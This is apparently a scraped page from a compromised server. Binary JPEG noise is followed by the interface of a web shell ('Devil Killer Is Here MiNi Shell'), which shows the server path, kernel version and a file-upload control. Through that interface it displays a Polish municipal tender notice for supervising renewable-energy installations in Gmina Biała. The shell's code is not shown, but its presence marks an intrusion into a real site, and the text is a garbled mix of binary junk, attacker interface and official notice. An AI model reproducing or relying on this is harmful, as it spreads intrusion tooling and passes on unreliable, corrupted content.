JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250924/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250924/0043887501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie nadzoru inwestorskiego nad zadaniem inwestycyjnym pn.: &#34;Montaż urządzeń OZE na terenie Gminy Biała - etap II&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Biała</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934602</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">brak</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Biała Druga</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-350</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">438419090</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminabiala.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminabiala.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie nadzoru inwestorskiego nad zadaniem inwestycyjnym pn.: &#34;Montaż urządzeń OZE na terenie Gminy Biała - etap II&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6df4f376-5c90-443a-8033-d66f62ad8b6f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00438875</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00057483/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Pełnienie nadzoru inwestorskiego nad zadaniem inwestycyjnym pn.: &#34;Montaż urządzeń OZE na terenie Gminy Biała - etap II&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamawiający informuje, iż zamówienie realizowane jest w ramach projektu „Montaż urządzeń OZE na terenie Gminy Biała-etap II”. Numer wniosku: FELD.02.05-IZ.00-0065/23. Numer naboru: FELD.02.05-IZ.00-001/23. Numer i nazwa Priorytetu: 2 Fundusze Europejskie dla zielonego Łódzkiego. Numer i nazwa Działania: FELD.02.05 Odnawialne źródła energii programu regionalnego FE dla Łódzkiego 2021-2027. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6df4f376-5c90-443a-8033-d66f62ad8b6f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub <br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (tj. Dz. U. z 2024 r., poz. 1557), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie <br/>zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na <br/>Platformie e-Zamówienia. <br/>Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia , o którym mowa w pkt 11.6 SWZ, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, z uwzględnieniem rodzaju przekazywanych danych (Zamawiający dopuszcza także format RAR) i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia, o którym mowa w pkt 11.6 SWZ, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a)	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności z uwzględnieniem rodzaju przekazywanych danych (i przekazuje się jako załącznik), <br/>lub<br/>b)	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa <br/>w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (tj. Dz. U. z 2022 r. poz. 1233 ze zm.), Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert (sposób składania ofert opisano w rozdziale 13 SWZ) odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W przypadku gdy Wykonawca przekazuje Zamawiającemu dane osobowe swoich współpracowników, zobowiązany jest poinformować swoich współpracowników o zasadach przetwarzania jego danych przez Zamawiającego jako Administratora jego danych.<br/>Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), dalej jako: RODO uprzejmie informuję, że: <br/>1.	Administratorem Pani/Pana danych osobowych jest Gmina Biała. Kontakt Urząd Gminy Biała, Biała Druga 4b, 98-350 Biała, tel. 438419090, adres e-mail: sekretariat@gminabiala.pl.<br/>2.	W sprawach związanych z danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych poprzez adres e-mail: inspektor@myiod.pl lub listownie na adres siedziby administratora z dopiskiem IOD.<br/>3.	W przypadku kiedy Pani/Pana dane nie zostały bezpośrednio przez Panią̨/Pana udostępnione zostały udostępnione przez przedstawicieli podmiotu, który Pani/Pan reprezentuje, w zakresie : <br/>•	imię̨ i nazwisko,<br/>•	służbowy nr telefonu,<br/>•	służbowy adres e-mail,<br/>•	miejsce pracy,<br/>•	inne dane podane przez przedstawicieli podmiotu. <br/>4.	Pani/Pana dane osobowe będą̨ przetwarzane w celu: <br/>•	zawarcia i realizacji umowy <br/>•	podjęcia obrony przed ewentualnymi roszczeniami lub dochodzenia ewentualnych roszczeń́ <br/>•	związanych z umową, jeżeli powstanie spór dotyczący ww. umowy <br/>•	podejmowania działań́ związanych z ustaleniem warunków zawarcia umowy/porozumienia oraz ułatwienia komunikacji związanej z wykonaniem umowy/porozumienia<br/>•	udostępniania informacji sektora publicznego do ponownego wykorzystania, jeśli Pani/Pana dane podlegają̨ udostępnieniu<br/>•	wypełnienia obowiązku archiwizacji dokumentów. <br/>5.	Odbiorcami Pani/Pana danych osobowych mogą̨ być́: <br/>•	podmioty, którym Administrator powierzy przetwarzanie danych osobowych, w szczególności podmioty świadczące usługi informatyczne, pocztowe; <br/>•	organy publiczne i inne podmioty, którym Administrator udostępni dane osobowe na podstawie przepisów prawa<br/>6.	Pani/Pana dane osobowe będą̨ przechowywane przez okres niezbędny do realizacji celu przetwarzania, tj. zawarcia i realizacji umowy/porozumienia, a następnie przez okres 5 lat od momentu wygaśnięcia/rozwiązania porozumienia na podstawie Instrukcji Kancelaryjnej (kat. archiwalna B5) i przepisów ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach. <br/>7.	Przysługują̨ Pani/Panu następujące uprawnienia: <br/>•	prawo dostępu do danych i uzyskania ich kopii <br/>•	prawo do sprostowania danych <br/>•	prawo do usunięcia danych <br/>•	prawo ograniczenia przetwarzania <br/>•	prawo wniesienia sprzeciwu wobec przetwarzania. <br/>Aby skorzystać́ z powyższych praw należy skontaktować́ się z nami lub z naszym inspektorem ochrony danych (dane kontaktowe zawarte są powyżej). <br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa), jeśli uzna Pani/Pan że przetwarzamy Pani/Pana dane niezgodnie z prawem. <br/>8.	Nie przekazujemy Pani/Pana danych do państw trzecich. <br/>9.	Pani/Pana dane osobowe nie podlegają̨ zautomatyzowanemu przetwarzaniu, w tym profilowaniu. <br/>10.	Podanie przez Panią̨/Pana danych osobowych jest warunkiem zawarcia umowy lub jej wykonywania. Skutkiem niepodania danych będzie niezawarcie umowy lub brak możliwości jej wykonywania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GO.271.2.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 334413,32 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego nad zadaniem inwestycyjnym pn.: „Montaż urządzeń OZE na terenie Gminy Biała - etap II&#34;.<br/>2.	W ramach niniejszego zamówienia nadzór inwestorski obejmuje branżę sanitarną, elektryczną i konstrukcyjno-budowlaną oraz obejmuje proces zaprojektowania <br/>i zrealizowania dostawy, montażu oraz uruchomienia:<br/>-instalacji kotłów na pellet ‐ 37 szt.,<br/>-instalacji kolektorów słonecznych ‐ 78 szt.,<br/>-instalacji fotowoltaicznych ‐ 250 szt.,<br/>-instalacji pomp ciepła na potrzeby c.w.u. – 9 szt.,<br/>-instalacji pomp ciepła na potrzeby c.o. i c.w.u. ‐ 114 szt.,<br/>o rozmiarze wskazanym w zawartym w programie funkcjonalno-użytkowym.<br/>3.	Opis przedmiotu zamówienia wskazujący na zakres realizowanych prac objętych nadzorem inwestorskim zamieszczono na stronie: https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-10a31feb-8633-4d91-a691-8fc54bc2aeb3 <br/>4.	Do podstawowych obowiązków Wykonawcy należy zapewnienie inspektora nadzoru inwestorskiego wykonującego wszystkie czynności przewidziane dla inspektora nadzoru na mocy przepisów ustawy z dnia 7 lipca 1994 roku - prawo budowlane (t. j. Dz. U. 2025 r, poz. 418) oraz niniejszej SWZ z załącznikami.<br/>5.	Przedmiot zamówienia, o którym mowa w pkt. 4.1 – 4.4 SWZ został szczegółowo określony w (Załączniku Nr 1 do SWZ) – Szczegółowy opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71631300-3 - Usługi technicznego nadzoru budowlanego</p> <p class="mb-0">72220000-3 - Usługi doradcze w zakresie systemów i doradztwo techniczne</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>Lp.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena	60<br/>2	Doświadczenie Inspektorów Nadzoru	40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/><br/>Kryterium „Cena” – 60%<br/><br/>Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/><br/><br/>C = Cn/Cb x 60 pkt<br/><br/>	gdzie,<br/>C- ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/><br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/><br/>Kryterium „Doświadczenie Inspektorów Nadzoru” – 40%.<br/><br/>Wykonawca zobowiązuje się do przedłożenia informacji o doświadczeniu inspektorów nadzoru (DIN) w załączniku do Formularza ofertowego - Dane dotyczące Zespołu Nadzorującego oceniane w ramach kryteriów oceny ofert. <br/><br/>Nieprzedłożenie tego załącznika, albo brak podania w jego treści informacji spowoduje przyznanie Wykonawcy w ramach tego kryterium 0 pkt. Zamawiający przyzna punkty wg metodologii oceny tylko za doświadczenie, które w sposób całkowity spełni wymogi opisane w tabeli dla danego zadania. Za częściowe spełnienie wymogu w projekcie przyznanie zostanie 0 pkt. Zamawiający zastrzega, iż Wykaz doświadczenia personelu Wykonawcy, stanowiący Załącznik do Formularza ofertowego, nie podlega uzupełnieniu. <br/>Z treści wykazu musi jednoznacznie wynikać doświadczenie poszczególnych inspektorów spełniające warunki, o których mowa w niniejszym punkcie, <br/>w przeciwnym razie Zamawiający nie przyzna punktów.<br/><br/>W tym kryterium badane będzie doświadczenie inspektora nadzoru branży sanitarnej i inspektora nadzoru branży elektrycznej. <br/><br/>Zamawiający przyzna dodatkowe punkty, jeśli osoby wskazane powyżej posiadają doświadczenie ponad wymagane dla spełnienia warunku udziału w postępowaniu określonego w pkt. 6.1.4, ppkt 2) SWZ, tj. ponad wymagane doświadczenie w pełnieniu funkcji danego inspektora nadzoru. <br/><br/>Zamawiający przyzna punkty w kryterium Doświadczenia Inspektorów Nadzoru (DIN) następująco:<br/><br/>a)	Doświadczenie Inspektora nadzoru inwestorskiego w branży sanitarnej: maksymalnie 20 pkt - 20 %- (DIN1),<br/>b)	Doświadczenie Inspektora nadzoru inwestorskiego w branży elektrycznej: maksymalnie 20 pkt - 20 %- (DIN2).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Inspektorów Nadzoru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1.1.	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/><br/>1.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/><br/>1.3.	sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/><br/>1.4.	zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>1)	Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, <br/>że należycie wykonał, (a w przypadku świadczeń okresowych lub ciągłych wykonuje) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 (dwie) usługi, z których każda obejmowała nadzór inwestorski w rozumieniu ustawy Prawo budowlane w branży sanitarnej, elektrycznej i konstrukcyjno-budowlanej, nad <br/>realizacją montażu min. 100 kompletnych instalacji OZE (przez instalację OZE Zamawiający rozumie instalację fotowoltaiczną lub instalację pomp ciepła do CO i CWU lub instalację kotłów na pellet lub instalację kolektorów słonecznych). <br/><br/><br/>2)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji: <br/>a)	min. jedną osobą (która będzie pełniła funkcję osoby weryfikującej dokumentację projektową) posiadającą:<br/>	uprawnienia do projektowania w specjalności instalacyjnej <br/>w zakresie instalacji i urządzeń cieplnych, których zakres uprawnia ją do projektowania robót objętych przedmiotem zamówienia, <br/>	doświadczenie (w ciągu ostatnich 5 lat przed terminem składania ofert) 